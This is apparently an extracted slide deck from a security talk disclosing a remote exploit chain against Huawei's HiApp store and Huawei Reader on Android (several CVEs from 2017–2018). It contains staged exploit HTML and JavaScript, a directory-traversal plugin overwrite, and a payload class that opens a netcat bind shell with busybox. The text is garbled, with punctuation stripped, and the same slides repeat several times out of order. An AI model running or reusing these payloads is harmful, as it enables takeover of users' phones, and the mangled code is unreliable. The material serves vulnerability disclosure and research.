int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
